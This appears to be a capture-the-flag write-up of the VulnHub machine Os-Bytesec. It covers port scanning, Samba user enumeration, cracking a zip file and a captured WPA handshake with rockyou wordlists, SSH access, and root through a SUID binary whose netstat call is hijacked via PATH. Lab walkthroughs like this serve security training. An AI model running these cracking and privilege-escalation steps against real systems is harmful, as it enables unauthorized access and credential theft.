[VULNHUB] Os-Bytesec

For Indonesian version of this write-up, click here.

Setup

I run the VM using Virtualbox with bridged adapter. Some machine may require a specific hostname in /etc/hosts . Otherwise, you can add the machine’s IP address into /etc/hosts to make things more easier and simpler. Here I used bytesec.vh as the machine’s hostname.

Information Gathering

NMAP

nmap -sV -sC -p- bytesec.vh -oN initial.nmap -v

PORT     STATE SERVICE     VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: 08:00:27:B3:78:46 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The server runs HTTP at port 80, SMB at 139 and 445, and SSH at 2525.

GOBUSTER

gobuster dir -u http://bytesec.vh -w /usr/share/wordlists/dirb/big.txt

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/gallery (Status: 301)
/html (Status: 301)
/img (Status: 301)
/js (Status: 301)
/news (Status: 301)
/server-status (Status: 403)

No really interesting stuff. But I found this image in /img .

Does this machine has BlueKeep vulnerability? 😕

BlueKeep is a remote code execution vulnerability exists in Remote Desktop Services — formerly known as Terminal Services — when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (microsoft)

ENUM4LINUX

Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, netlookup, and nmblookup.

We use enum4linux to gather information like domain, OS running inside, SMB version, even the user inside a domain.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

SMBCLIENT

From the result of enum4linux above, we got 3 user, after trying to login with each username, user smb is the only one able to log in.

smbclient //bytesec.vh/smb -U smb -p

Download the save.zip .

FCRACKZIP

It turns out that the save.zip is locked with a password, we can try to bruteforce it using fcrackzip.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

And we got our password cracked.

PASSWORD FOUND!!!!: pw == hacker1smb:

The content of save.zip is one image named secret.jpg that contains no “secret”, and a packet capture file named user.cap.

user.cap

After examining the user.cap for a while, there are lots of deauth packet. We can assume that this is a packet capture file from someone trying to capture three-way handshake between a wifi client and access point (using airodump/ aireplay). We can use aircrack to crack the captured three-way handshake.

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

snowflake is the wifi password.

Exploitation

User Flag

We can ssh to the port 2525, using the user.cap ESSID (blackjax) and the cracked password (snowflake).

Root Flag

Next we can do system enumeration using linenum.sh. Make sure to run the script in rwx directory such as /tmp .

[-] SUID files:
.
.
-rwsr-xr-x 1 root root 7432 Nov 4 20:00 /usr/bin/netscan

One particular point that pretty interesting is there is files (or script?) named netscan which has SUID/SETUID flag. SUID/SETUID flag means we can run the associated file with root permission without providing any password. Also the netscan file is a file that usually do not exist in other normal systems.

Netscan

It turns out that the netscan is actually a “script” to run netstat created by someone to just output the established connection. With that logic in mind we can trick the system by “changing” the netstat file.

Privilege Escalation

  1. Create a file named netstat in /tmp.

echo "/bin/sh" > netstat

2. Add the /tmp directory into $PATH .

export PATH=/tmp:$PATH

3. Run netscan .

And we get the root 😃

So how does it works?

So basically we manipulate the flow of netscan script. The script is supposed to call real netstat which is a tool to show all active connections, but because we overwrite the environment variable ($PATH), the script calls the fake netstat in /tmp instead.

Actually overwriting the $PATH is not enough to gain privilege escalation. But because netscan has a SUID flag, the netscan invoke the root shell instead.

That's for today, hope you guys like it *Dave Lee voice* 👋

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store